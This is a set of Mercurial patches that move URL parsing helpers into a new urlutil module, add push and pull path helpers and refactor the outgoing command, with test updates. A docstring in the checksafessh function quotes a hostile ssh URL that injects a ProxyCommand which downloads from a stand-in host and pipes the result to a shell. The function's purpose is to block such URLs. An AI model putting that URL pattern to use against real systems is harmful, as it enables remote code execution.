b"!~*'()+" + _safepchars = b"/!~*'()+:\\" + _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match + + def __init__(self, path, parsequery=True, parsefragment=True): + # type: (bytes, bool, bool) -> None + # We slowly chomp away at path until we have only the path left + self.scheme = self.user = 
self.passwd = self.host = None + self.port = self.path = self.query = self.fragment = None + self._localpath = True + self._hostport = b'' + self._origpath = path + + if parsefragment and b'#' in path: + path, self.fragment = path.split(b'#', 1) + + # special case for Windows drive letters and UNC paths + if hasdriveletter(path) or path.startswith(b'\\\\'): + self.path = path + return + + # For compatibility reasons, we can't handle bundle paths as + # normal URLS + if path.startswith(b'bundle:'): + self.scheme = b'bundle' + path = path[7:] + if path.startswith(b'//'): + path = path[2:] + self.path = path + return + + if self._matchscheme(path): + parts = path.split(b':', 1) + if parts[0]: + self.scheme, path = parts + self._localpath = False + + if not path: + path = None + if self._localpath: + self.path = b'' + return + else: + if self._localpath: + self.path = path + return + + if parsequery and b'?' in path: + path, self.query = path.split(b'?', 1) + if not path: + path = None + if not self.query: + self.query = None + + # // is required to specify a host/authority + if path and path.startswith(b'//'): + parts = path[2:].split(b'/', 1) + if len(parts) > 1: + self.host, path = parts + else: + self.host = parts[0] + path = None + if not self.host: + self.host = None + # path of file:///d is /d + # path of file:///d:/ is d:/, not /d:/ + if path and not hasdriveletter(path): + path = b'/' + path + + if self.host and b'@' in self.host: + self.user, self.host = self.host.rsplit(b'@', 1) + if b':' in self.user: + self.user, self.passwd = self.user.split(b':', 1) + if not self.host: + self.host = None + + # Don't split on colons in IPv6 addresses without ports + if ( + self.host + and b':' in self.host + and not ( + self.host.startswith(b'[') and self.host.endswith(b']') + ) + ): + self._hostport = self.host + self.host, self.port = self.host.rsplit(b':', 1) + if not self.host: + self.host = None + + if ( + self.host + and self.scheme == b'file' + and self.host not in 
(b'localhost', b'127.0.0.1', b'[::1]') + ): + raise error.Abort( + _(b'file:// URLs can only refer to localhost') + ) + + self.path = path + + # leave the query string escaped + for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): + v = getattr(self, a) + if v is not None: + setattr(self, a, urlreq.unquote(v)) + + def copy(self): + u = url(b'temporary useless value') + u.path = self.path + u.scheme = self.scheme + u.user = self.user + u.passwd = self.passwd + u.host = self.host + u.path = self.path + u.query = self.query + u.fragment = self.fragment + u._localpath = self._localpath + u._hostport = self._hostport + u._origpath = self._origpath + return u + + @encoding.strmethod + def __repr__(self): + attrs = [] + for a in ( + b'scheme', + b'user', + b'passwd', + b'host', + b'port', + b'path', + b'query', + b'fragment', + ): + v = getattr(self, a) + if v is not None: + attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) + return b'<url %s>' % b', '.join(attrs) + + def __bytes__(self): + r"""Join the URL's components back into a URL string. 
+ + Examples: + + >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) + 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) + 'http://user:pw@host:80/?foo=bar&baz=42' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) + 'http://user:pw@host:80/?foo=bar%3dbaz' + >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) + 'ssh://user:pw@[::1]:2200//home/joe#' + >>> bytes(url(b'http://localhost:80//')) + 'http://localhost:80//' + >>> bytes(url(b'http://localhost:80/')) + 'http://localhost:80/' + >>> bytes(url(b'http://localhost:80')) + 'http://localhost:80/' + >>> bytes(url(b'bundle:foo')) + 'bundle:foo' + >>> bytes(url(b'bundle://../foo')) + 'bundle:../foo' + >>> bytes(url(b'path')) + 'path' + >>> bytes(url(b'file:///tmp/foo/bar')) + 'file:///tmp/foo/bar' + >>> bytes(url(b'file:///c:/tmp/foo/bar')) + 'file:///c:/tmp/foo/bar' + >>> print(url(br'bundle:foo\bar')) + bundle:foo\bar + >>> print(url(br'file:///D:\data\hg')) + file:///D:\data\hg + """ + if self._localpath: + s = self.path + if self.scheme == b'bundle': + s = b'bundle:' + s + if self.fragment: + s += b'#' + self.fragment + return s + + s = self.scheme + b':' + if self.user or self.passwd or self.host: + s += b'//' + elif self.scheme and ( + not self.path + or self.path.startswith(b'/') + or hasdriveletter(self.path) + ): + s += b'//' + if hasdriveletter(self.path): + s += b'/' + if self.user: + s += urlreq.quote(self.user, safe=self._safechars) + if self.passwd: + s += b':' + urlreq.quote(self.passwd, safe=self._safechars) + if self.user or self.passwd: + s += b'@' + if self.host: + if not (self.host.startswith(b'[') and self.host.endswith(b']')): + s += urlreq.quote(self.host) + else: + s += self.host + if self.port: + s += b':' + urlreq.quote(self.port) + if self.host: + s += b'/' + if self.path: + # TODO: similar to the query string, we should not unescape the + # path when we store it, the path might contain '%2f' = '/', + # which we 
should *not* escape. + s += urlreq.quote(self.path, safe=self._safepchars) + if self.query: + # we store the query in escaped form. + s += b'?' + self.query + if self.fragment is not None: + s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) + return s + + __str__ = encoding.strmethod(__bytes__) + + def authinfo(self): + user, passwd = self.user, self.passwd + try: + self.user, self.passwd = None, None + s = bytes(self) + finally: + self.user, self.passwd = user, passwd + if not self.user: + return (s, None) + # authinfo[1] is passed to urllib2 password manager, and its + # URIs must not contain credentials. The host is passed in the + # URIs list because Python < 2.4.3 uses only that to search for + # a password. + return (s, (None, (s, self.host), self.user, self.passwd or b'')) + + def isabs(self): + if self.scheme and self.scheme != b'file': + return True # remote URL + if hasdriveletter(self.path): + return True # absolute for our purposes - can't be joined() + if self.path.startswith(br'\\'): + return True # Windows UNC path + if self.path.startswith(b'/'): + return True # POSIX-style + return False + + def localpath(self): + # type: () -> bytes + if self.scheme == b'file' or self.scheme == b'bundle': + path = self.path or b'/' + # For Windows, we need to promote hosts containing drive + # letters to paths with drive letters. 
+ if hasdriveletter(self._hostport): + path = self._hostport + b'/' + self.path + elif ( + self.host is not None and self.path and not hasdriveletter(path) + ): + path = b'/' + path + return path + return self._origpath + + def islocal(self): + '''whether localpath will return something that posixfile can open''' + return ( + not self.scheme + or self.scheme == b'file' + or self.scheme == b'bundle' + ) + + +def hasscheme(path): + # type: (bytes) -> bool + return bool(url(path).scheme) # cast to help pytype + + +def hasdriveletter(path): + # type: (bytes) -> bool + return bool(path) and path[1:2] == b':' and path[0:1].isalpha() + + +def urllocalpath(path): + # type: (bytes) -> bytes + return url(path, parsequery=False, parsefragment=False).localpath() + + +def checksafessh(path): + # type: (bytes) -> None + """check if a path / url is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. + """ + path = urlreq.unquote(path) + if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): + raise error.Abort( + _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) + ) + + +def hidepassword(u): + # type: (bytes) -> bytes + '''hide user credential in a url string''' + u = url(u) + if u.passwd: + u.passwd = b'***' + return bytes(u) + + +def removeauth(u): + # type: (bytes) -> bytes + '''remove all authentication information from a url string''' + u = url(u) + u.user = u.passwd = None + return bytes(u) + + class paths(dict): """Represents a collection of paths and their configs. @@ -103,7 +530,7 @@ @pathsuboption(b'pushurl', b'pushloc') def pushurlpathoption(ui, path, value): - u = util.url(value) + u = url(value) # Actually require a URL. 
if not u.scheme: ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) @@ -148,7 +575,7 @@ raise ValueError(b'rawloc must be defined') # Locations may define branches via syntax <base>#<branch>. - u = util.url(rawloc) + u = url(rawloc) branch = None if u.fragment: branch = u.fragment diff --git a/tests/test-doctest.py b/tests/test-doctest.py --- a/tests/test-doctest.py +++ b/tests/test-doctest.py @@ -158,6 +158,7 @@ ('mercurial.util', '{}'), ('mercurial.utils.dateutil', '{}'), ('mercurial.utils.stringutil', '{}'), + ('mercurial.utils.urlutil', '{}'), ('tests.drawdag', '{}'), ('tests.test-run-tests', '{}'), ('tests.test-url', "{'optionflags': 4}"), diff --git a/tests/test-hgweb-auth.py b/tests/test-hgweb-auth.py --- a/tests/test-hgweb-auth.py +++ b/tests/test-hgweb-auth.py @@ -10,7 +10,10 @@ url, util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -60,7 +63,7 @@ print('URI:', pycompat.strurl(uri)) try: pm = url.passwordmgr(ui, urlreq.httppasswordmgrwithdefaultrealm()) - u, authinfo = util.url(uri).authinfo() + u, authinfo = urlutil.url(uri).authinfo() if authinfo is not None: pm.add_password(*_stringifyauthinfo(authinfo)) print( @@ -198,10 +201,12 @@ def testauthinfo(fullurl, authurl): print('URIs:', fullurl, authurl) pm = urlreq.httppasswordmgrwithdefaultrealm() - ai = _stringifyauthinfo(util.url(pycompat.bytesurl(fullurl)).authinfo()[1]) + ai = _stringifyauthinfo( + urlutil.url(pycompat.bytesurl(fullurl)).authinfo()[1] + ) pm.add_password(*ai) print(pm.find_user_password('test', authurl)) -print('\n*** Test urllib2 and util.url\n') +print('\n*** Test urllib2 and urlutil.url\n') testauthinfo('http://user@example.com:8080/foo', 'http://example.com:8080/foo') diff --git a/tests/test-hgweb-auth.py.out b/tests/test-hgweb-auth.py.out --- a/tests/test-hgweb-auth.py.out +++ b/tests/test-hgweb-auth.py.out @@ -211,7 +211,7 @@ URI: http://example.org/foo abort 
-*** Test urllib2 and util.url +*** Test urllib2 and urlutil.url URIs: http://user@example.com:8080/foo http://example.com:8080/foo ('user', '') diff --git a/tests/test-url.py b/tests/test-url.py --- a/tests/test-url.py +++ b/tests/test-url.py @@ -275,7 +275,7 @@ def test_url(): """ >>> from mercurial import error, pycompat - >>> from mercurial.util import url + >>> from mercurial.utils.urlutil import url >>> from mercurial.utils.stringutil import forcebytestr This tests for edge cases in url.URL's parsing algorithm. Most of # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618202094 -7200 # Mon Apr 12 06:34:54 2021 +0200 # Node ID 4452cb7884042b769202ba58382f49e028ea6c25 # Parent ffd3e823a7e543d20c00799a71a75f820e4702d8 urlutil: extract `parseurl` from `hg` into the new module The new module is well fitting for this new code. And this will be useful to make the gathered code collaborate more later. Differential Revision: https://phab.mercurial-scm.org/D10375 diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -1042,7 +1042,7 @@ if opts is None: opts = {} dest = ui.expandpath(remote or b'default-push', remote or b'default') - dest, branches = hg.parseurl(dest, None)[:2] + dest, branches = urlutil.parseurl(dest, None)[:2] ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) revs, checkout = hg.addbranchrevs(repo, repo, branches, None) diff --git a/hgext/infinitepush/__init__.py b/hgext/infinitepush/__init__.py --- a/hgext/infinitepush/__init__.py +++ b/hgext/infinitepush/__init__.py @@ -116,6 +116,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) from mercurial import ( @@ -683,7 +684,9 @@ def _pull(orig, ui, repo, source=b"default", **opts): opts = pycompat.byteskwargs(opts) # Copy paste from `pull` command - source, branches = hg.parseurl(ui.expandpath(source), opts.get(b'branch')) + source, branches = urlutil.parseurl( + ui.expandpath(source), 
opts.get(b'branch') + ) scratchbookmarks = {} unfi = repo.unfiltered() diff --git a/hgext/largefiles/storefactory.py b/hgext/largefiles/storefactory.py --- a/hgext/largefiles/storefactory.py +++ b/hgext/largefiles/storefactory.py @@ -43,12 +43,12 @@ # meaning the current directory. if repo is None: path = ui.expandpath(b'default') - path, _branches = hg.parseurl(path) + path, _branches = urlutil.parseurl(path) remote = hg.peer(repo or ui, {}, path) elif path == b'default-push' or path == b'default': remote = repo else: - path, _branches = hg.parseurl(path) + path, _branches = urlutil.parseurl(path) remote = hg.peer(repo or ui, {}, path) # The path could be a scheme so use Mercurial's normal functionality diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -594,7 +594,7 @@ # be used for finding local-only changes for narrowing. They will # also define the set of revisions to update for widening. 
remotepath = ui.expandpath(remotepath or b'default') - url, branches = hg.parseurl(remotepath) + url, branches = urlutil.parseurl(remotepath) ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) remote = hg.peer(repo, opts, url) diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -531,7 +531,7 @@ '''Return the revisions present locally but not in dest''' ui = repo.ui url = ui.expandpath(dest or b'default-push', dest or b'default') - url = hg.parseurl(url)[0] + url = urlutil.parseurl(url)[0] ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) revs = [r for r in revs if r >= 0] diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1614,7 +1614,7 @@ outgoing = discovery.outgoing(repo, common, heads) else: dest = ui.expandpath(dest or b'default-push', dest or b'default') - dest, branches = hg.parseurl(dest, opts.get(b'branch')) + dest, branches = urlutil.parseurl(dest, opts.get(b'branch')) other = hg.peer(repo, opts, dest) revs = [repo[r].hex() for r in revs] revs, checkout = hg.addbranchrevs(repo, repo, branches, revs) @@ -3841,7 +3841,7 @@ peer = None try: if source: - source, branches = hg.parseurl(ui.expandpath(source)) + source, branches = urlutil.parseurl(ui.expandpath(source)) # only pass ui when no repo peer = hg.peer(repo or ui, opts, source) repo = peer.local() @@ -4311,7 +4311,7 @@ cmdutil.check_incompatible_arguments(opts, b'subrepos', [b'bundle']) if opts.get(b'bookmarks'): - source, branches = hg.parseurl( + source, branches = urlutil.parseurl( ui.expandpath(source), opts.get(b'branch') ) other = hg.peer(repo, opts, source) @@ -5390,7 +5390,7 @@ if not sources: sources = [b'default'] for source in sources: - source, branches = hg.parseurl( + source, branches = urlutil.parseurl( ui.expandpath(source), opts.get(b'branch') ) ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(source)) @@ -7225,7 +7225,7 @@ 
return def getincoming(): - source, branches = hg.parseurl(ui.expandpath(b'default')) + source, branches = urlutil.parseurl(ui.expandpath(b'default')) sbranch = branches[0] try: other = hg.peer(repo, {}, source) @@ -7248,7 +7248,9 @@ source = sbranch = sother = commoninc = incoming = None def getoutgoing(): - dest, branches = hg.parseurl(ui.expandpath(b'default-push', b'default')) + dest, branches = urlutil.parseurl( + ui.expandpath(b'default-push', b'default') + ) dbranch = branches[0] revs, checkout = hg.addbranchrevs(repo, repo, branches, None) if source != dest: diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1060,7 +1060,7 @@ if not remote_revs: - remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl)) + remoteurl, branches = urlutil.parseurl(ui.expandpath(remoteurl)) remote = hg.peer(repo, opts, remoteurl) ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(remoteurl)) else: @@ -3652,7 +3652,7 @@ ) source = b"default" - source, branches = hg.parseurl(ui.expandpath(source)) + source, branches = urlutil.parseurl(ui.expandpath(source)) url = urlutil.url(source) defaultport = {b'https': 443, b'ssh': 22} @@ -3762,7 +3762,7 @@ for backup in backups: # Much of this is copied from the hg incoming logic source = ui.expandpath(os.path.relpath(backup, encoding.getcwd())) - source, branches = hg.parseurl(source, opts.get(b"branch")) + source, branches = urlutil.parseurl(source, opts.get(b"branch")) try: other = hg.peer(repo, opts, source) except error.LookupError as ex: diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -132,13 +132,9 @@ def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' - - u = urlutil.url(path) - branch = None - if u.fragment: - branch = u.fragment - u.fragment = None - return bytes(u), (branch, branches or []) + msg = b'parseurl(...) 
moved to mercurial.utils.urlutil' + util.nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.parseurl(path, branches=branches) schemes = { @@ -285,7 +281,7 @@ # the sharedpath always ends in the .hg; we want the path to the repo source = repo.vfs.split(repo.sharedpath)[0] - srcurl, branches = parseurl(source) + srcurl, branches = urlutil.parseurl(source) srcrepo = repository(repo.ui, srcurl) repo.srcrepo = srcrepo return srcrepo @@ -312,7 +308,7 @@ if isinstance(source, bytes): origsource = ui.expandpath(source) - source, branches = parseurl(origsource) + source, branches = urlutil.parseurl(origsource) srcrepo = repository(ui, source) rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None) else: @@ -676,7 +672,7 @@ if isinstance(source, bytes): origsource = ui.expandpath(source) - source, branches = parseurl(origsource, branch) + source, branches = urlutil.parseurl(origsource, branch) srcpeer = peer(ui, peeropts, source) else: srcpeer = source.peer() # in case we were called with a localrepo @@ -1266,7 +1262,9 @@ (remoterepo, incomingchangesetlist, displayer) parameters, and is supposed to contain only code that can't be unified. 
""" - source, branches = parseurl(ui.expandpath(source), opts.get(b'branch')) + source, branches = urlutil.parseurl( + ui.expandpath(source), opts.get(b'branch') + ) other = peer(repo, opts, source) cleanupfn = other.close try: diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -41,6 +41,7 @@ from .utils import ( dateutil, stringutil, + urlutil, ) # helpers for processing parsed tree @@ -2122,7 +2123,7 @@ # i18n: "remote" is a keyword dest = getstring(l[1], _(b"remote requires a repository path")) dest = repo.ui.expandpath(dest or b'default') - dest, branches = hg.parseurl(dest) + dest, branches = urlutil.parseurl(dest) other = hg.peer(repo, {}, dest) n = other.lookup(q) diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -445,6 +445,16 @@ return bytes(u) +def parseurl(path, branches=None): + '''parse url#branch, returning (url, (branch, branches))''' + u = url(path) + branch = None + if u.fragment: + branch = u.fragment + u.fragment = None + return bytes(u), (branch, branches or []) + + class paths(dict): """Represents a collection of paths and their configs. 
diff --git a/tests/test-hg-parseurl.py b/tests/test-hg-parseurl.py --- a/tests/test-hg-parseurl.py +++ b/tests/test-hg-parseurl.py @@ -2,44 +2,48 @@ import unittest -from mercurial import hg +from mercurial.utils import urlutil class ParseRequestTests(unittest.TestCase): def testparse(self): self.assertEqual( - hg.parseurl(b'http://example.com/no/anchor'), + urlutil.parseurl(b'http://example.com/no/anchor'), (b'http://example.com/no/anchor', (None, [])), ) self.assertEqual( - hg.parseurl(b'http://example.com/an/anchor#foo'), + urlutil.parseurl(b'http://example.com/an/anchor#foo'), (b'http://example.com/an/anchor', (b'foo', [])), ) self.assertEqual( - hg.parseurl(b'http://example.com/no/anchor/branches', [b'foo']), + urlutil.parseurl( + b'http://example.com/no/anchor/branches', [b'foo'] + ), (b'http://example.com/no/anchor/branches', (None, [b'foo'])), ) self.assertEqual( - hg.parseurl(b'http://example.com/an/anchor/branches#bar', [b'foo']), + urlutil.parseurl( + b'http://example.com/an/anchor/branches#bar', [b'foo'] + ), (b'http://example.com/an/anchor/branches', (b'bar', [b'foo'])), ) self.assertEqual( - hg.parseurl( + urlutil.parseurl( b'http://example.com/an/anchor/branches-None#foo', None ), (b'http://example.com/an/anchor/branches-None', (b'foo', [])), ) self.assertEqual( - hg.parseurl(b'http://example.com/'), + urlutil.parseurl(b'http://example.com/'), (b'http://example.com/', (None, [])), ) self.assertEqual( - hg.parseurl(b'http://example.com'), + urlutil.parseurl(b'http://example.com'), (b'http://example.com/', (None, [])), ) self.assertEqual( - hg.parseurl(b'http://example.com#foo'), + urlutil.parseurl(b'http://example.com#foo'), (b'http://example.com/', (b'foo', [])), ) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618258976 -7200 # Mon Apr 12 22:22:56 2021 +0200 # Node ID 067840864f370c72fdfb7de4f0049d370f15dad7 # Parent 4452cb7884042b769202ba58382f49e028ea6c25 urlutil: add a `get_push_paths` to perform the push 
destination logic As is this changeset does not change anything. However having an official entry point will help unifying the logic and encapsulate the details and update the logic to support path definition pointing to multiple other paths. Differential Revision: https://phab.mercurial-scm.org/D10377 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5720,12 +5720,9 @@ # this lets simultaneous -r, -b options continue working opts.setdefault(b'rev', []).append(b"null") - if not dests: - dests = [None] some_pushed = False result = 0 - for dest in dests: - path = ui.getpath(dest, default=(b'default-push', b'default')) + for path in urlutil.get_push_paths(repo, ui, dests): if not path: raise error.ConfigError( _(b'default repository not configured!'), diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -445,6 +445,14 @@ return bytes(u) +def get_push_paths(repo, ui, dests): + """yields all the `path` selected as push destination by `dests`""" + if not dests: + dests = [None] + for dest in dests: + yield ui.getpath(dest, default=(b'default-push', b'default')) + + def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' u = url(path) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618309724 -7200 # Tue Apr 13 12:28:44 2021 +0200 # Node ID df7439cc6806eae92fd769913bdd8a1b7e2fdae5 # Parent 067840864f370c72fdfb7de4f0049d370f15dad7 urlutil: add a `get_pull_paths` to perform the pull destination logic As is this changeset does not change anything. However having an official entry point will help unifying the logic and encapsulate the details and update the logic to support path definition pointing to multiple other paths.
Differential Revision: https://phab.mercurial-scm.org/D10378 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5387,12 +5387,8 @@ hint = _(b'use hg pull followed by hg update DEST') raise error.InputError(msg, hint=hint) - if not sources: - sources = [b'default'] - for source in sources: - source, branches = urlutil.parseurl( - ui.expandpath(source), opts.get(b'branch') - ) + sources = urlutil.get_pull_paths(repo, ui, sources, opts.get(b'branch')) + for source, branches in sources: ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(source)) ui.flush() other = hg.peer(repo, opts, source) diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -453,6 +453,15 @@ yield ui.getpath(dest, default=(b'default-push', b'default')) +def get_pull_paths(repo, ui, sources, default_branches=()): + """yields all the `(path, branch)` selected as pull source by `sources`""" + if not sources: + sources = [b'default'] + for source in sources: + url = ui.expandpath(source) + yield parseurl(url, default_branches) + + def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' u = url(path) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618084501 -7200 # Sat Apr 10 21:55:01 2021 +0200 # Node ID 6071bfab629204eea9ac170bf0359c0d39d39964 # Parent df7439cc6806eae92fd769913bdd8a1b7e2fdae5 infinitepush: use the new function to determine push destination Since 066b8d8f75b8, the push command accept multiple destination. `infinitepush` was not aware of that. We now use the new `urlutil.get_push_paths` function to determine the push destination, fixing the issue. This will also make future evolution of that logic transparent for infinitepush We still disallow push to multiple destinations if infinite push is enabled because I don't know what this means for infinite push. 
However user will now get a clear error message instead of a crash. Differential Revision: https://phab.mercurial-scm.org/D10379 diff --git a/hgext/infinitepush/__init__.py b/hgext/infinitepush/__init__.py --- a/hgext/infinitepush/__init__.py +++ b/hgext/infinitepush/__init__.py @@ -811,7 +811,7 @@ return common, True, remoteheads -def _push(orig, ui, repo, dest=None, *args, **opts): +def _push(orig, ui, repo, *dests, **opts): opts = pycompat.byteskwargs(opts) bookmark = opts.get(b'bookmark') # we only support pushing one infinitepush bookmark at once @@ -839,18 +839,18 @@ oldphasemove = extensions.wrapfunction( exchange, b'_localphasemove', _phasemove ) - # Copy-paste from `push` command - path = ui.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.Abort( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) + + paths = list(urlutil.get_push_paths(repo, ui, dests)) + if len(paths) > 1: + msg = _(b'cannot push to multiple path with infinitepush') + raise error.Abort(msg) + + path = paths[0] destpath = path.pushloc or path.loc # Remote scratch bookmarks will be deleted because remotenames doesn't # know about them. Let's save it before push and restore after remotescratchbookmarks = _readscratchremotebookmarks(ui, repo, destpath) - result = orig(ui, repo, dest, *args, **pycompat.strkwargs(opts)) + result = orig(ui, repo, *dests, **pycompat.strkwargs(opts)) if common.isremotebooksenabled(ui): if bookmark and scratchpush: other = hg.peer(repo, opts, destpath) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618161614 -7200 # Sun Apr 11 19:20:14 2021 +0200 # Node ID 627bb1875fee6ade373d319c8fba56a2a781f1e3 # Parent 6071bfab629204eea9ac170bf0359c0d39d39964 outgoing: remove some early return Since 066b8d8f75b8, the push command accept multiple destination. However `hg outgoing` does not. On the way to fix this, we need to clean up the outgoing code. 
We start with removing some early return to make the code ready to house more changes. Differential Revision: https://phab.mercurial-scm.org/D10380 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1360,28 +1360,28 @@ limit = logcmdutil.getlimit(opts) o, other = _outgoing(ui, repo, dest, opts) + ret = 1 try: - if not o: - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return recurse() + if o: + ret = 0 - if opts.get(b'newest_first'): - o.reverse() - ui.pager(b'outgoing') - displayer = logcmdutil.changesetdisplayer(ui, repo, opts) - count = 0 - for n in o: - if limit is not None and count >= limit: - break - parents = [p for p in repo.changelog.parents(n) if p != nullid] - if opts.get(b'no_merges') and len(parents) == 2: - continue - count += 1 - displayer.show(repo[n]) - displayer.close() + if opts.get(b'newest_first'): + o.reverse() + ui.pager(b'outgoing') + displayer = logcmdutil.changesetdisplayer(ui, repo, opts) + count = 0 + for n in o: + if limit is not None and count >= limit: + break + parents = [p for p in repo.changelog.parents(n) if p != nullid] + if opts.get(b'no_merges') and len(parents) == 2: + continue + count += 1 + displayer.show(repo[n]) + displayer.close() cmdutil.outgoinghooks(ui, repo, other, opts, o) - recurse() - return 0 # exit code is zero since we found outgoing changes + ret = min(ret, recurse()) + return ret # exit code is zero since we found outgoing changes finally: other.close() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618162263 -7200 # Sun Apr 11 19:31:03 2021 +0200 # Node ID b2740c54724343e20197cc53653743dae3957456 # Parent 627bb1875fee6ade373d319c8fba56a2a781f1e3 outgoing: make `recurse` a real function If we want to use this in a loop, we need to be able to pass argument. 
Differential Revision: https://phab.mercurial-scm.org/D10381 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1348,15 +1348,17 @@ raise +def _outgoing_recurse(ui, repo, dest, opts): + ret = 1 + if opts.get(b'subrepos'): + ctx = repo[None] + for subpath in sorted(ctx.substate): + sub = ctx.sub(subpath) + ret = min(ret, sub.outgoing(ui, dest, opts)) + return ret + + def outgoing(ui, repo, dest, opts): - def recurse(): - ret = 1 - if opts.get(b'subrepos'): - ctx = repo[None] - for subpath in sorted(ctx.substate): - sub = ctx.sub(subpath) - ret = min(ret, sub.outgoing(ui, dest, opts)) - return ret limit = logcmdutil.getlimit(opts) o, other = _outgoing(ui, repo, dest, opts) @@ -1380,7 +1382,7 @@ displayer.show(repo[n]) displayer.close() cmdutil.outgoinghooks(ui, repo, other, opts, o) - ret = min(ret, recurse()) + ret = min(ret, _outgoing_recurse(ui, repo, dest, opts)) return ret # exit code is zero since we found outgoing changes finally: other.close() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618319600 -7200 # Tue Apr 13 15:13:20 2021 +0200 # Node ID 50b79f8b802d67d02e42f8b82e6a896666d2ede1 # Parent b2740c54724343e20197cc53653743dae3957456 outgoing: move filtering logic in its own function This move code dedicated to a single purpose together and make the main code simpler. 
Right when we are getting ready to make it more complex :-D Differential Revision: https://phab.mercurial-scm.org/D10382 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1358,27 +1358,40 @@ return ret +def _outgoing_filter(repo, revs, opts): + """apply revision filtering/ordering option for outgoing""" + limit = logcmdutil.getlimit(opts) + no_merges = opts.get(b'no_merges') + if opts.get(b'newest_first'): + revs.reverse() + if limit is None and not no_merges: + for r in revs: + yield r + return + + count = 0 + cl = repo.changelog + for n in revs: + if limit is not None and count >= limit: + break + parents = [p for p in cl.parents(n) if p != nullid] + if no_merges and len(parents) == 2: + continue + count += 1 + yield n + + def outgoing(ui, repo, dest, opts): - limit = logcmdutil.getlimit(opts) o, other = _outgoing(ui, repo, dest, opts) ret = 1 try: if o: ret = 0 - if opts.get(b'newest_first'): - o.reverse() ui.pager(b'outgoing') displayer = logcmdutil.changesetdisplayer(ui, repo, opts) - count = 0 - for n in o: - if limit is not None and count >= limit: - break - parents = [p for p in repo.changelog.parents(n) if p != nullid] - if opts.get(b'no_merges') and len(parents) == 2: - continue - count += 1 + for n in _outgoing_filter(repo, o, opts): displayer.show(repo[n]) displayer.close() cmdutil.outgoinghooks(ui, repo, other, opts, o) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618164046 -7200 # Sun Apr 11 20:00:46 2021 +0200 # Node ID efc6f6a794bd4b3529cec4a29c4cd7cb997e094d # Parent 50b79f8b802d67d02e42f8b82e6a896666d2ede1 outgoing: merge the code handling --graph with the main one The --graph code had its own copy of the logic. With the previous reorganisation of the code, we can now merge it with the main code, reducing fragile 